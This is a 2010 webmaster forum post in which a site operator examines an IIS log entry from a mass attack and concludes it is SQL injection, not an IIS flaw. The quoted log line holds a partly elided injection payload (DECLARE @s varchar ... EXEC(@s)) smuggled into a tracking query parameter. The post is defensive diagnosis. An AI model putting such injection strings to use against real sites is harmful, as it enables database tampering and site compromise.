- - Microsoft
- -- Microsoft IIS Web Server and ASP.NET
- ---- Mass IIS attack under way
marcel - 8:14 pm on Jun 11, 2010 (gmt 0)
Fortunately, it doesn't seem to be an IIS attack, but an SQL injection attack.
I'm still trying to find out which third party software is affected, when I check the attack code:
|2010-06-07 13:31:15 W3SVC1 webserver 192.168.1.10 GET /page.aspx utm_source=campaign&utm_medium=banner&utm_campaign=campaignid&utm_content=100×200′;dEcLaRe%20@s%20vArChAr(8000) |
...6F523B2D2D%20eXEc(@s)– 80 – 121.xx.#*$!.xx HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) –
- www.example.com 200 0 0 32068 1685 0
I see a number of 'utm_' query string parameters, which seem to point to Google Analytics and Feedburner...
or am I looking in the wrong direction?
[edited by: marcel at 8:24 pm (utc) on Jun 11, 2010]
Thread source: http://www.webmasterworld.com/microsoft_asp_net/4151390.htm
Brought to you by WebmasterWorld: http://www.webmasterworld.com